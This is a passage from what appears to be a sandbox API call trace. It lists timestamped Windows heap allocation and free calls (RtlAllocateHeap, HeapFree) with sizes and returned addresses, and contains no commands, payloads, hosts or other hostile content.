(HeapHandle=0x540000, Flags=0x0, Size=0x640) returned 0x558910 [0268.643] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5be2) returned 0x56db40 [0268.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x55e1a0 | out: hHeap=0x540000) returned 1 [0268.644] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.644] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x890) returned 0x58d940 [0268.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xac0) returned 0x58d940 [0268.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x54b9e0 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x960) returned 0x58d940 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x960) returned 0x58e2b0 [0268.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x460) returned 0x558910 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0f) returned 0x58ec20 [0268.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58e2b0 | out: hHeap=0x540000) returned 1 [0268.645] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1c17) returned 0x573730 [0268.645] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe00) returned 0x58d940 [0268.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x700) returned 0x575350 [0268.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x573730 | out: hHeap=0x540000) returned 1 [0268.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x153d) returned 0x573730 [0268.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58ec20 | out: hHeap=0x540000) returned 1 [0268.646] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575350 | out: hHeap=0x540000) returned 1 [0268.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2277) returned 0x58d940 [0268.646] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1157) returned 0x574c80 [0268.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8a0) returned 0x575de0 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574c80 | out: hHeap=0x540000) returned 1 [0268.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1fc7) returned 0x58d940 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x573730 | out: hHeap=0x540000) returned 1 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575de0 | out: hHeap=0x540000) returned 1 [0268.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1657) returned 0x573730 [0268.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xb20) returned 0x574d90 [0268.647] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x590) returned 0x58f910 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x573730 | out: hHeap=0x540000) returned 1 [0268.647] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x574d90 | out: hHeap=0x540000) returned 1 [0268.648] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2f96) returned 0x573730 [0268.648] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.648] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58f910 | out: hHeap=0x540000) returned 1 [0268.648] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2b47) returned 0x5766d0 [0268.648] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x15b7) returned 0x58d940 [0268.648] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xad0) returned 0x58ef00 [0268.649] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5766d0 | out: hHeap=0x540000) returned 1 [0268.649] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.649] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58ef00 | out: hHeap=0x540000) returned 1 [0268.649] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2697) returned 0x5766d0 [0268.649] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1367) returned 0x58d940 [0268.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9a0) returned 0x58ecb0 [0268.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5766d0 | out: hHeap=0x540000) returned 1 [0268.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x474d) returned 0x5766d0 [0268.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x573730 | out: hHeap=0x540000) returned 1 [0268.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58ecb0 | out: hHeap=0x540000) returned 1 [0268.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x920) returned 0x58d940 [0268.650] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1b47) returned 0x58d940 [0268.650] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd90) returned 0x57ae30 [0268.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6d0) returned 0x58f490 [0268.651] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.651] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57ae30 | out: hHeap=0x540000) returned 1 [0268.651] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58f490 | out: hHeap=0x540000) returned 1 [0268.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x5d0) returned 0x558910 [0268.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x6adf) returned 0x5593e0 [0268.651] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5766d0 | out: hHeap=0x540000) returned 1 [0268.651] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1887) returned 0x58d940 [0268.651] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xc30) returned 0x58f1d0 [0268.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x620) returned 0x558910 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58f1d0 | out: hHeap=0x540000) returned 1 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8f0) returned 0x58d940 [0268.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x480) returned 0x558910 [0268.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x240) returned 0x58e240 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.652] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58e240 | out: hHeap=0x540000) returned 1 [0268.652] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x550900 [0268.653] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x54b9e0 | out: hHeap=0x540000) returned 1 [0268.653] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56db40 | out: hHeap=0x540000) returned 1 [0268.654] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.654] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x550900 | out: hHeap=0x540000) returned 1 [0268.654] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9900) returned 0x5593e0 [0268.655] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1bf0) returned 0x58d940 [0268.657] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.657] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9937) returned 0x56db40 [0268.658] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.658] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x54b830 [0268.658] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9900) returned 0x5593e0 [0268.658] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1bf0) returned 0x58d940 [0268.659] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58d940 | out: hHeap=0x540000) returned 1 [0268.845] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9937) returned 0x58d940 [0268.847] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5593e0 | out: hHeap=0x540000) returned 1 [0268.847] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x550e50 [0268.847] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x54b830 | out: hHeap=0x540000) returned 1 [0268.847] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x563790 | out: hHeap=0x540000) returned 1 [0268.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x57da40 | out: hHeap=0x540000) returned 1 [0268.848] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5508b0 | out: hHeap=0x540000) returned 1 [0268.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5593e0 [0268.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x577480 [0268.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x548d40 [0268.848] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x597280 [0268.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559320 [0268.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x548d40 | out: hHeap=0x540000) returned 1 [0268.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5aa490 [0268.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x18) returned 0x559160 [0268.849] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x559320 | out: hHeap=0x540000) returned 1 [0268.849] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5bd6a0 [0268.850] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x54b290 [0268.850] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x559160 | out: hHeap=0x540000) returned 1 [0268.850] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5d08b0 [0268.850] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x558490 [0268.850] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x54b290 | out: hHeap=0x540000) returned 1 [0268.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5e3ac0 [0268.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x5f6cd0 [0268.851] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x48) returned 0x550a90 [0268.851] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558490 | out: hHeap=0x540000) returned 1 [0268.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x609ee0 [0268.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x61d0f0 [0268.852] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1e60080 [0268.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x68) returned 0x548d40 [0268.853] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x550a90 | out: hHeap=0x540000) returned 1 [0268.853] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1e73290 [0268.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1e864a0 [0268.854] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1e996b0 [0268.855] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1eac8c0 [0268.855] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x98) returned 0x5450b0 [0268.855] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x548d40 | out: hHeap=0x540000) returned 1 [0268.855] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1ebfad0 [0268.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1ed2ce0 [0268.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1ee5ef0 [0268.856] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1ef9100 [0268.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1f0c310 [0268.857] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1f1f520 [0268.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xe0) returned 0x544ce0 [0268.858] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5450b0 | out: hHeap=0x540000) returned 1 [0268.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1f32730 [0268.858] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x1ff0080 [0268.859] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2003290 [0268.859] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20164a0 [0268.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20296b0 [0268.860] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x203c8c0 [0268.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x204fad0 [0268.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2062ce0 [0268.861] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2075ef0 [0268.862] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x150) returned 0x54b0b0 [0268.862] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x544ce0 | out: hHeap=0x540000) returned 1 [0268.862] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2089100 [0268.862] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x209c310 [0268.863] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20af520 [0268.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20c2730 [0268.864] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20d5940 [0268.865] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20e8b50 [0268.865] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x20fbd60 [0268.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x210ef70 [0268.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2122180 [0268.866] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2135390 [0268.867] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x21485a0 [0268.867] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x215b7b0 [0268.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x216e9c0 [0268.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2181bd0 [0268.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x1f8) returned 0x558910 [0268.868] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x54b0b0 | out: hHeap=0x540000) returned 1 [0268.868] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2194de0 [0268.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x21a7ff0 [0268.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x21bb200 [0268.869] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x21ce410 [0268.870] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x21f0080 [0268.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2203290 [0268.871] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22164a0 [0268.872] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22296b0 [0268.872] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x223c8c0 [0268.873] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x224fad0 [0268.873] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2262ce0 [0268.873] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2275ef0 [0268.874] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2289100 [0268.874] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x229c310 [0268.875] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22af520 [0268.875] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22c2730 [0268.875] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22d5940 [0268.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22e8b50 [0268.876] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x22fbd60 [0268.877] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x230ef70 [0268.877] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2322180 [0268.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x2f0) returned 0x558b10 [0268.878] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558910 | out: hHeap=0x540000) returned 1 [0268.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2335390 [0268.878] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23485a0 [0268.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x235b7b0 [0268.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x236e9c0 [0268.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2381bd0 [0268.879] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2394de0 [0268.880] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23a7ff0 [0269.005] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23bb200 [0269.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23ce410 [0269.006] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23e1620 [0269.007] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x23f4830 [0269.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2407a40 [0269.008] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x241ac50 [0269.009] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x242de60 [0269.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2441070 [0269.010] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2454280 [0269.011] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2467490 [0269.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x247a6a0 [0269.012] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x248d8b0 [0269.013] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x24a0ac0 [0269.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x24b3cd0 [0269.014] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x24c6ee0 [0269.015] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x24da0f0 [0269.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x24ed300 [0269.016] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2500510 [0269.017] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2513720 [0269.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2526930 [0269.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2539b40 [0269.018] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x254cd50 [0269.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x255ff60 [0269.019] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2573170 [0269.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x468) returned 0x56c5f0 [0269.020] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x558b10 | out: hHeap=0x540000) returned 1 [0269.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2586380 [0269.020] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2599590 [0269.022] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x25ac7a0 [0269.023] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x25bf9b0 [0269.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x25d2bc0 [0269.024] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x25f0080 [0269.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2603290 [0269.028] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26164a0 [0269.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26296b0 [0269.029] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x263c8c0 [0269.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x264fad0 [0269.030] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2662ce0 [0269.031] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2675ef0 [0269.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2689100 [0269.032] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x269c310 [0269.033] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26af520 [0269.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26c2730 [0269.034] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26d5940 [0269.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26e8b50 [0269.035] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x26fbd60 [0269.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x270ef70 [0269.036] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2722180 [0269.037] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2735390 [0269.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27485a0 [0269.038] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x275b7b0 [0269.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x276e9c0 [0269.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2781bd0 [0269.039] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2794de0 [0269.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27a7ff0 [0269.040] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27bb200 [0269.041] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27ce410 [0269.190] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27e1620 [0269.191] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x27f4830 [0269.191] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2807a40 [0269.192] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x281ac50 [0269.192] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x282de60 [0269.193] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2841070 [0269.193] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2854280 [0269.194] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x2867490 [0269.194] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x287a6a0 [0269.195] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x288d8b0 [0269.195] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x28a0ac0 [0269.196] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x28b3cd0 [0269.196] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x13200) returned 0x28c6ee0 [0269.197] 